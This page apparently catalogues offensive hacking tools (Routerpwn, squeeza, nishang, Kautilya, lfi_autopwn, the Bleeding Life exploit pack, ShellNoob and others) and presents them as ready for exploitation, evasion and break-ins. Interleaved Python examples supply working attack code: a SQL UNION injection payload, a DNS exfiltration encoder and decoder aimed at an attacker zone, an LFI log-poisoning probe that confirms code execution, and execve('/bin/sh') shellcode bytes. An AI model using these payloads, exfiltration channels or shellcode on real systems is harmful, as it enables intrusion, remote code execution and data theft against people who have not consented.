Exploitation

Routerpwn

== ROUTERPWN.com ==
Routerpwn.com is a web application that helps you exploit vulnerabilities in residential routers.

It is a compilation of ready-to-run local and remote web exploits.
Programmed in JavaScript and HTML so that it runs on all smartphones and mobile internet devices.
It is a single page, so you can store it offline for local exploitation without an internet connection.

== Exploits ==
# 154 Total (11 Modules) 08/09/2012 #

Sagem Fast Telnet Root Password Generator
A1/Telekom PRG EAV4202N Default WPA Key Generator
Discus DRG A225 WiFi router Default WPA2-PSK Key Generator
Thomson BBox BBKeys TG787 Default Wireless Key Generator
EasyBox Standard WPA2 Key Generator
ZynOS (Huawei) Configuration Decompressor
Thomson SpeedTouch STKeys Default Wireless Key Generator
Huawei HG5XX Mac2wepkey Default Wireless Key Generator
Backdoor password in Accton-based switches (3com, Dell, SMC, Foundry and EdgeCore)
Arris Password of The Day Generator

20x 27x authentication bypass (xss + info disclosure)
17x 18x 20x 27x CRLF denial of service remote MDC
17x 18x 20x 27x CRLF denial of service
17x 18x 20x 27x password_required.html authentication bypass
17x 18x 20x 27x CD35_SETUP_01 authentication bypass
17x 18x 20x 27x CD35_SETUP_01 password reset
17x 18x 20x 27x DSL denial of service
17x 18x 20x 27x mgmt_data configuration disclosure
17x 18x 20x 27x H04 authentication bypass
17x 18x 20x 27x 38x Add domain to hosts table CSRF
Backdoor password in Accton-based switches (3com, Dell, SMC, Foundry and EdgeCore)
iMC Intelligent Management Center configuration disclosure
iMC Intelligent Management Center traversal
OfficeConnect command execution
AP 8760 authentication bypass
OfficeConnect configuration disclosure
OfficeConnect 3CRWE454G72 configuration disclosure
3cradsl72 configuration disclosure
3cradsl72 information disclosure & authentication bypass
812 denial of service
812 denial of service 2

Vicnum (Hacking Game)

This is the vicnum project ("vicnum")

This project was registered on SourceForge.net on Jan 27, 2009, and is described by the project team as follows:

A flexible web app showing vulnerabilities such as cross site scripting, sql injections, and session management issues. Helpful to IT auditors honing web security skills and setting up 'capture the flag'. Play the game at http://vicnum.ciphertechs.com

Vicnum (1.5) is an OWASP project consisting of multiple vulnerable web applications based on games commonly used to kill time. These applications demonstrate common web security problems such as cross site scripting, SQL injection, and session management issues. The goal of this project is to strengthen the security of web applications by educating different groups (students, management, users, developers, auditors) as to what might go wrong in a web app. And of course it's OK to have a little fun. There are currently three applications (or challenges) in this version of Vicnum: Guessnum, a game to guess a number the computer has picked; Jotto, a game to guess a word the computer has picked; and the Union Challenge, which is new to version 1.5. Besides untarring the tar into the right folder and some Apache web server tweaking, three MySQL tables will need to be created.
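The Union Challenge named above turns on a UNION-based SQL injection. The following is an added example written for this page, not code from the Vicnum distribution: it uses Python with an in-memory SQLite database and a constructed schema (a words table the game would look up, and a users table a player must never read) to show the vulnerable string-built query beside its parameterised form, plus the column-count probe that precedes any UNION extraction.

```python
import sqlite3

# Constructed sample schema, not Vicnum's own: the table a word game looks up,
# plus an unrelated table a player must never read.
SCHEMA = """
CREATE TABLE words (id INTEGER PRIMARY KEY, word TEXT, hint TEXT);
INSERT INTO words (word, hint) VALUES ('apple', 'fruit'), ('house', 'building');
CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT);
INSERT INTO users (name, password) VALUES ('admin', 's3cret');
"""


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def hint_vulnerable(conn, word: str) -> list:
    # The player's guess is pasted into the SQL text, so it can change the query.
    sql = "SELECT hint FROM words WHERE word = '" + word + "'"
    return [row[0] for row in conn.execute(sql)]


def hint_safe(conn, word: str) -> list:
    # Bound parameter: the guess stays data, whatever characters it contains.
    return [row[0] for row in conn.execute(
        "SELECT hint FROM words WHERE word = ?", (word,))]


def probe_column_count(conn, max_cols: int = 8):
    """Step one of a UNION attack: the appended SELECT must return as many
    columns as the original, so try NULL, then NULL, NULL, ... until the
    database stops complaining. Returns None if no count up to max_cols works."""
    for n in range(1, max_cols + 1):
        nulls = ", ".join(["NULL"] * n)
        try:
            hint_vulnerable(conn, f"x' UNION SELECT {nulls} -- ")
            return n
        except sqlite3.OperationalError:
            continue
    return None


# 'x' matches no word, so only the UNION half contributes rows; the trailing
# comment swallows the closing quote the application appends.
UNION_PAYLOAD = "x' UNION SELECT name || ':' || password FROM users -- "


def demo():
    """Same payload against both query styles: (leaked rows, safe rows)."""
    conn = build_db()
    return hint_vulnerable(conn, UNION_PAYLOAD), hint_safe(conn, UNION_PAYLOAD)
```

In the string-built version the payload returns the users row; in the bound version the same string is just a word nobody guessed and the result is empty. SQLite is used so the example runs offline; the query shapes carry over to MySQL, which Vicnum uses, where the `--` comment must be followed by a space as it is here.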

Smartphone Pentest Framework

The product of a DARPA Cyber Fast Track grant, the Smartphone Pentest Framework (SPF) is an open source security tool designed to aid in assessing the security posture of smartphones in an environment. SPF version 0.1 contains remote attacks, client-side attacks, social engineering attacks, and post-exploitation modules targeting smartphone devices. It includes a text-based management console, a web-based GUI, and a management Android app. Additionally, a post-exploitation “agent” for the Android platform is included. SPF is an ongoing project, with plans in the works for support for additional devices, more modules in each attack vector category, integration with existing tools such as Metasploit and SET, etc.

squeeza

1. Name
Squeeza - SQL Injection without the pain of syringes

2. Authors
Marco Slaviero < marco(at)sensepost(dot)com >
Haroon Meer

3. License, version & release date
License : GPLv2
Version : v0.22
Release Date : 2008/08/24

4. Description
squeeza is a tool that helps exploit SQL injection vulnerabilities in broken web applications. Its functionality is split into creating data on the database (by executing commands, copying in files, issuing new SQL queries) and extracting that data through various channels (dns, timing, http error messages).

Currently, it supports the following databases:

Microsoft SQL Server
MySQL (only when multi-queries, i.e. several statements in one call, are enabled, which is not too common)
squeeza is not a tool for finding injection points. That recipe generally starts with 1 x analyst.

5. Usage

5.1 Installation is easy. Untar the archive into an appropriate spot.
> $ tar xvzf squeeza-0.21.tar.gz
Thereafter, edit the configuration file. By default, this is called 'squeeza.config' and resides in the same directory as the rest of the scripts.
Off the bat, you'll want to edit at least the following configuration items:

host
url
querystring
method
sql_prefix
sql_postfix
dns_domain
The default mode is command mode, and the default channel is dns.

5.2 Data Flow Model As already mentioned, squeeza splits the creation of data at the server away from the extraction of that data off the server (within certain constraints). Data is created by a /mode/, and extracted via a /channel/. By doing so, it is possible to mix 'n match modes with channels, which we think is pretty nifty/flexible.

Currently supported modes:
command mode : supports commands execution on the database server
copy mode : supports copying of files from the database server to the local machine
sql mode : supports the execution of arbitrary sql queries

Currently supported channels (the three named in the description above):
dns channel : extracts data through DNS lookups for names under the domain set in dns_domain
timing channel : extracts data through differences in response time
http error channel : extracts data through HTTP error messages
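The mode/channel split is clearest in the dns channel: whatever a mode produced on the database server leaves as a series of DNS lookups for names under a domain the attacker controls, and the authoritative server for that domain reassembles them. The following is an added example written for this page, not squeeza's own code: a Python encoder that turns a byte string into such names and a decoder that rebuilds the data from what the authoritative server observes, including retries, reordering and unrelated lookups. The zone exfil.example.net, the chunk size and the data.seq.total label layout are this example's own choices (squeeza's corresponding setting is dns_domain).

```python
import base64

# Assumption for this example: the attacker-controlled zone that the database
# server's resolver will eventually query (the role squeeza's dns_domain plays).
DNS_DOMAIN = "exfil.example.net"
MAX_LABEL = 63   # RFC 1035: a single label is at most 63 octets
CHUNK = 30       # raw bytes per query; 30 bytes -> 48 base32 characters, under MAX_LABEL


def encode_queries(data: bytes, domain: str = DNS_DOMAIN) -> list:
    """Split data into numbered chunks, one DNS name per chunk.

    base32 without padding keeps each label inside the hostname alphabet and
    survives case folding by caching resolvers, which base64 would not."""
    total = (len(data) + CHUNK - 1) // CHUNK
    names = []
    for seq in range(total):
        piece = data[seq * CHUNK:(seq + 1) * CHUNK]
        label = base64.b32encode(piece).decode("ascii").rstrip("=").lower()
        if len(label) > MAX_LABEL:
            raise ValueError("label too long")
        # <data>.<seq>.<total>.<domain>: seq/total let the receiver reorder and
        # detect loss, since each name may arrive more than once or not at all.
        names.append(f"{label}.{seq}.{total}.{domain}")
    return names


def decode_queries(observed: list, domain: str = DNS_DOMAIN) -> bytes:
    """Reassemble the payload from the names seen at the authoritative server.

    Tolerates duplicates (resolver retries), out-of-order arrival and unrelated
    lookups; raises if any chunk never arrived."""
    suffix = "." + domain.lower()
    chunks, total = {}, None
    for name in observed:
        name = name.lower().rstrip(".")
        if not name.endswith(suffix):
            continue                       # noise: a lookup for some other name
        parts = name[:-len(suffix)].split(".")
        if len(parts) != 3 or not (parts[1].isdigit() and parts[2].isdigit()):
            continue                       # malformed, not one of ours
        label, seq, count = parts
        total = int(count)
        padded = label.upper() + "=" * (-len(label) % 8)   # restore base32 padding
        chunks[int(seq)] = base64.b32decode(padded)
    if total is None or any(i not in chunks for i in range(total)):
        raise ValueError("incomplete transfer")
    return b"".join(chunks[i] for i in range(total))


def demo() -> bool:
    # Constructed stand-in for command output a mode would have stored in the DB.
    output = b"nt authority\\network service\r\nC:\\inetpub\\wwwroot\r\n"
    queries = encode_queries(output)
    # Simulate what the authoritative server logs: reversed order, a retry, noise.
    seen = queries[::-1] + [queries[0], "www.example.com"]
    return decode_queries(seen) == output
```

The sequence number and total in every name are what make the channel usable in practice: resolvers retry, cache and reorder, so the receiver cannot rely on arrival order or on seeing each name exactly once.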

nishang

Nishang is a framework and collection of scripts and payloads that enables the use of PowerShell for offensive security and post-exploitation during penetration tests. The scripts were written to meet the author's needs during real penetration tests. It contains many interesting scripts like download and execute, keylogger, password hash dumper, time based payload and much more.

PAYLOADS
It contains many interesting scripts like download and execute, keylogger, dns txt pwnage, wait for command and much more.

HELP
All payloads and scripts are Get-Help compatible. Use "Get-Help -full" on a PowerShell prompt to get full help details.

LATEST CODE
Check out the svn repo for the latest code
svn checkout http://nishang.googlecode.com/svn/trunk/ nishang

kautilya

Kautilya is a toolkit which provides various payloads for a Human Interface Device (HID) which may help in breaking into a computer. Written in Ruby, the toolkit contains useful payloads and modules which could be used at different stages of a penetration test. Kautilya is tested with the Teensy++ device but could be used with most HIDs. It has been successfully tested for breaking into Windows 7, Ubuntu 11 and Mac OS X Lion.

- The Windows payloads and modules are written mostly in PowerShell (in combination with native commands) and are tested on Windows 7 and Windows 8.

- The Linux payloads are mostly shell scripts (those installed by default) in combination with commands. These are tested on Ubuntu 11.

- The OS X payloads are shell scripts (those installed by default) with usage of native commands. Tested on OS X Lion running on VMware.

- To get the latest version of the toolkit you should check out the svn repository using

"svn checkout http://kautilya.googlecode.com/svn/trunk/ kautilya"

In principle, Kautilya should work with any HID capable of acting as a keyboard. Kautilya has been tested on Teensy++2.0 and Teensy 3.0 from pjrc.com.

Vanguard

Vanguard is an extensible utility with module support, built for testing different types of web exploitation against a given domain.
Features

Main application features:
Fully Configurable
Web crawlers crawl all open HTTP and HTTPS ports reported by nmap
LibWhisker2 for HTTP IDS evasion (same options as nikto)
Tests via GET, POST, and COOKIE

Web penetration tests:
SQL injection (this test is signature free!)
LDAP Injection
XSS
File inclusion
Command Injection

Usage:
perl scan.pl -h [hostname] -e [evasion option]

Application Dependencies:

Notice: You must run this application as root.
You must have nmap from http://nmap.org installed to run this application correctly.
Protip: You can remove the root requirement by removing the check for root and modifying the nmap configuration (nmap's default SYN scan needs raw-socket privileges; an unprivileged connect scan, -sT, does not).

Perl Dependencies:
LibWhisker2 requires Net::SSLeay. You may need to get this from cpan, compile it in, or install it from your distribution's package manager.
YAML
Clone
Notice: You can install these libraries with cpan.

Lfi autopwn.pl

This script will attempt to gain code execution on sites vulnerable to local file inclusion, either via an httpd error log or by modifying the User-Agent and including a file that contains environment variables. The PHP code execution test is performed using an arithmetic challenge, and the script uses system() as its PHP execution function. Because every part of this process is randomized, including the math challenge, simple signature-based detection is defeated, while LibWhisker provides IDS evasion.

Features
Signature-free
Session Splicing
User-Agent and Log injection
Arithmetic Test

Usage
perl lfi_autopwn.pl -h www.vuln.tld -u "/vuln.ext?page=main&foo=bar" -i page
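The arithmetic challenge is the piece worth reusing: it separates "the log was included and the PHP in it ran" from "the log was merely displayed", which a fixed marker string cannot do. The following is an added example written for this page in Python, not lfi_autopwn.pl's own code: the probe builder, the confirmation check, a helper that rewrites the -i parameter of the -u URL to point at the file to include, and a constructed stand-in for the target (fake_include) so it runs offline. The access-log line format and the /var/log/apache2/access.log path are assumptions made for the example.

```python
import random
import re
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode


def set_include_param(path_qs: str, param: str, value: str) -> str:
    """Rewrite the injectable parameter (the -i argument in the usage line)
    so it points at the file to include; every other parameter is kept."""
    parts = urlsplit(path_qs)
    query = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
             if k != param]
    query.append((param, value))
    return urlunsplit(parts._replace(query=urlencode(query)))


def build_probe():
    """Fresh random operands per run: the User-Agent string that lands in the
    log has no fixed bytes for a signature to match on."""
    a, b = random.randint(1000, 9999), random.randint(1000, 9999)
    payload = f"<?php echo {a}*{b}; ?>"   # sent as the User-Agent header
    return payload, str(a * b)


def confirms_execution(body: str, payload: str, expected: str) -> bool:
    """True only when the product appears as a standalone number AND the raw
    PHP tag is absent. A page that prints the log back (a log viewer, or a
    file served as text) reflects the payload verbatim and must not count."""
    product_seen = re.search(r"(?<!\d)" + re.escape(expected) + r"(?!\d)", body)
    return bool(product_seen) and payload not in body


def fake_include(log_line: str, executes: bool) -> str:
    """Constructed stand-in for the target, not real server behaviour: the
    included log line is either parsed as PHP (executes=True) or echoed as-is."""
    if not executes:
        return "<pre>" + log_line + "</pre>"
    evaluated = re.sub(r"<\?php echo (\d+)\*(\d+); \?>",
                       lambda m: str(int(m.group(1)) * int(m.group(2))), log_line)
    return "<pre>" + evaluated + "</pre>"


def run_probe(executes: bool) -> bool:
    """End to end: poison a (constructed) access-log line through the
    User-Agent, include it, and decide whether PHP actually ran."""
    payload, expected = build_probe()
    log_line = ('10.0.0.5 - - [09/Aug/2012:12:00:00 +0000] "GET / HTTP/1.1" '
                f'200 512 "-" "{payload}"')
    body = fake_include(log_line, executes)
    return confirms_execution(body, payload, expected)
```

The two-sided check in confirms_execution is the practical point: the product must appear and the literal tag must be gone. Seeing only the tag means the file was included but not parsed as PHP, which is still an information disclosure finding but not code execution, and moving on to a system() payload at that point would be wasted traffic.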

Bleeding Life

Bleeding Life 2 is an exploit pack that targets web browsers on the Microsoft Windows operating system, achieving remote code execution through buffer overflow vulnerabilities.

shellnoob

shellnoob is a toolkit to help you write shellcode.

Features:
convert shellcode between different formats and sources. Formats currently supported: asm, bin, hex, obj, exe, C, python, ruby, pretty, safeasm, completec, shellstorm. (All details in the "Formats description" section.)
interactive asm-to-opcode conversion (and vice versa) mode. This is useful when you cannot use specific bytes in the shellcode and you want to figure out if a specific assembly instruction will cause problems.
support for both AT&T and Intel syntax. Check the --intel switch.
support for 32 and 64 bits (when playing on an x86_64 machine). Check the --64 switch.
resolve syscall numbers, constants, and error numbers (now implemented for real!).
portable and easily deployable (it only relies on gcc/as/objdump and python). And it is just one self-contained Python script!
in-place development: you run ShellNoob directly on the target architecture!
built-in support for Linux/x86, Linux/x86_64, Linux/ARM, FreeBSD/x86, FreeBSD/x86_64.
"*prepend breakpoint*" option. Check the -c switch.
read from stdin / write to stdout support (use "-" as filename)
uber cheap debugging: check the --to-strace and --to-gdb options!
Use ShellNoob as a Python module in your scripts! Check the "ShellNoob as a library" section.
Verbose mode shows the low-level steps of the conversion: useful to debug / understand / learn!
Extra plugins: binary patching made easy with the --file-patch, --vm-patch, --fork-nopper options! (all details below)
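Two of the features above, converting between formats and checking whether an instruction's encoding contains bytes the delivery path cannot carry, can be shown without an assembler. The following is an added example written for this page in Python, not ShellNoob's own code: converters between hex, C and Python string formats, a tolerant hex parser for the spellings people paste around, and a bad-byte scan. The sample inputs are constructed for the example: a well-known 23-byte Linux/x86 execve("/bin/sh") sequence, and two encodings of "put 11 in eax" (mov eax, 0xb as B8 imm32 and mov al, 0xb as B0 imm8, byte values per the x86 manual) to show why the asm-to-opcode mode matters when NUL is a bad byte.

```python
import re

# Sample input (constructed for this example): the well-known 23-byte Linux/x86
# execve("/bin/sh") sequence, chosen because it is already free of NUL bytes.
SAMPLE = bytes.fromhex(
    "31c0" "50" "682f2f7368" "682f62696e" "89e3" "50" "53" "89e1" "b00b" "cd80"
)

# Two encodings of "put 11 in eax" (constructed; byte values from the x86 manual):
# mov eax, 0xb is B8 imm32 and drags in three NULs; mov al, 0xb is B0 imm8 and does not.
MOV_EAX_11 = bytes.fromhex("b80b000000")
MOV_AL_11 = bytes.fromhex("b00b")

DEFAULT_BAD = b"\x00\x0a\x0d"   # NUL, LF, CR: the usual terminators for string copies


def from_hex(text: str) -> bytes:
    """Parse the loose hex spellings people paste: '31c0', '31 c0', '\\x31\\xc0', '0x31,0xc0'."""
    cleaned = re.sub(r"\\x|0x|[\s,\"']", "", text)
    if len(cleaned) % 2:
        raise ValueError("odd number of hex digits")
    return bytes.fromhex(cleaned)


def to_hex(sc: bytes) -> str:
    return sc.hex()


def to_python(sc: bytes, name: str = "shellcode") -> str:
    return f'{name} = b"' + "".join(f"\\x{b:02x}" for b in sc) + '"'


def to_c(sc: bytes, name: str = "shellcode", per_line: int = 12) -> str:
    """C string literal, wrapped so it stays readable in a source file."""
    rows = []
    for i in range(0, len(sc), per_line):
        rows.append('    "' + "".join(f"\\x{b:02x}" for b in sc[i:i + per_line]) + '"')
    return f"unsigned char {name}[] =\n" + "\n".join(rows) + ";"


def find_bad_bytes(sc: bytes, bad: bytes = DEFAULT_BAD) -> list:
    """(offset, value) pairs for every byte the delivery path cannot carry."""
    return [(i, b) for i, b in enumerate(sc) if b in bad]


def is_clean(sc: bytes, bad: bytes = DEFAULT_BAD) -> bool:
    return not find_bad_bytes(sc, bad)


def report(sc: bytes, bad: bytes = DEFAULT_BAD) -> str:
    """Human-readable summary: the hex, then each offending offset."""
    hits = find_bad_bytes(sc, bad)
    lines = [to_hex(sc)]
    lines += [f"  offset {i}: 0x{b:02x} is a bad byte" for i, b in hits]
    return "\n".join(lines)
```

The bad-byte set is the thing to adjust per target: NUL matters for strcpy-style sinks, CR/LF for anything parsed line by line, and HTTP or URL contexts add their own. Running find_bad_bytes over each candidate encoding, as the MOV_EAX_11 / MOV_AL_11 pair does, is the same decision ShellNoob's interactive asm-to-opcode mode supports, minus the assembler.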
